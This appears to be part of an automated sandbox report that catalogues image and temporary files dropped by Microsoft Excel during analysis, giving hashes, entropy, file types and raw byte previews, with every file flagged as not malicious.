                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):19408
                                                            Entropy (8bit):7.931403681362504
                                                            Encrypted:false
                                                            SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                            MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                            SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                            SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                            SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EC276A2.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):42465
                                                            Entropy (8bit):7.979580180885764
                                                            Encrypted:false
                                                            SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                            MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                            SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                            SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                            SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6037F43A.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):68702
                                                            Entropy (8bit):7.960564589117156
                                                            Encrypted:false
                                                            SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                            MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                            SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                            SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                            SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628BEF00.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):14828
                                                            Entropy (8bit):7.9434227607871355
                                                            Encrypted:false
                                                            SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                            MD5:58DD6AF7C438B638A88D107CC87009C7
                                                            SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                            SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                            SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D082F3.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):14828
                                                            Entropy (8bit):7.9434227607871355
                                                            Encrypted:false
                                                            SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                            MD5:58DD6AF7C438B638A88D107CC87009C7
                                                            SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                            SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                            SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86E287DD.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):42465
                                                            Entropy (8bit):7.979580180885764
                                                            Encrypted:false
                                                            SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                            MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                            SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                            SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                            SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A05E2D0E.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):11303
                                                            Entropy (8bit):7.909402464702408
                                                            Encrypted:false
                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):498420
                                                            Entropy (8bit):0.6411554016081152
                                                            Encrypted:false
                                                            SSDEEP:384:BgfXXwBkNWZ3cJuUvmWnTG+W4D68ddxzsFfW3:BOXwBkNWZ3cjvmWa+VD7
                                                            MD5:7310A627F7793EEE1EAB78907ECAB185
                                                            SHA1:21662BC1B328E9D971A16D689878430312B9D71A
                                                            SHA-256:690B8CE7E92B9276762FB2405B45E537A8326F2949DA3630B56A4ABDECB270E5
                                                            SHA-512:DA34AC876E49D03F13747AA042ECA89D001C340A9C916809D5868ABD7E2BA158EFAD29C46DF7A0C7A8DFFD756856A401176310A66151DAD919527625581607F0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...../..f.P.@..%...../.../.....T./.../.RQ]QT./.L./......./.8./.$Q]QT./.L./. ...Id.PL./.T./. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i............./.X...L./.../..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD1EF474.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):6364
                                                            Entropy (8bit):7.935202367366306
                                                            Encrypted:false
                                                            SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                            MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                            SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                            SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                            SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3862C4C.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):10202
                                                            Entropy (8bit):7.870143202588524
                                                            Encrypted:false
                                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB79A47F.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):11303
                                                            Entropy (8bit):7.909402464702408
                                                            Encrypted:false
                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF4CA1E5.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):10202
                                                            Entropy (8bit):7.870143202588524
                                                            Encrypted:false
                                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                            C:\Users\user\AppData\Local\Temp\~DF6138EF3239C89CAA.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\~DFDD0AA16FA1AF46B3.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\~DFEF1C1027FB9769E7.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\~DFFB7AE34A177A8EA8.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:CDFV2 Encrypted
                                                            Category:dropped
                                                            Size (bytes):234248
                                                            Entropy (8bit):7.971035071890227
                                                            Encrypted:false
                                                            SSDEEP:6144:X4Har3eEPWQ9luDUtOh8xcx6iGWegiwrjsYLnXt:X4+TPWQ9Mx6gRiwrjrt
                                                            MD5:8305DC6702F80D7EBE34CD8C63297561
                                                            SHA1:DB055CCE075213D510DE5CA9044EA76036DBCD07
                                                            SHA-256:9EAE576F7ECC05F106A7CFA605B1CA5BCD02C8D1C2C926920C0D7F0CB605B345
                                                            SHA-512:4B79BCB14665FD34D42979E0364480FF2A9050D7700DB3226393F5764350D3689B80431901BF275A80C60CF4D2BE5E013FD2AB2DE4D629A5EE826491C432B5EF
                                                            Malicious:false
                                                            Reputation:unknown
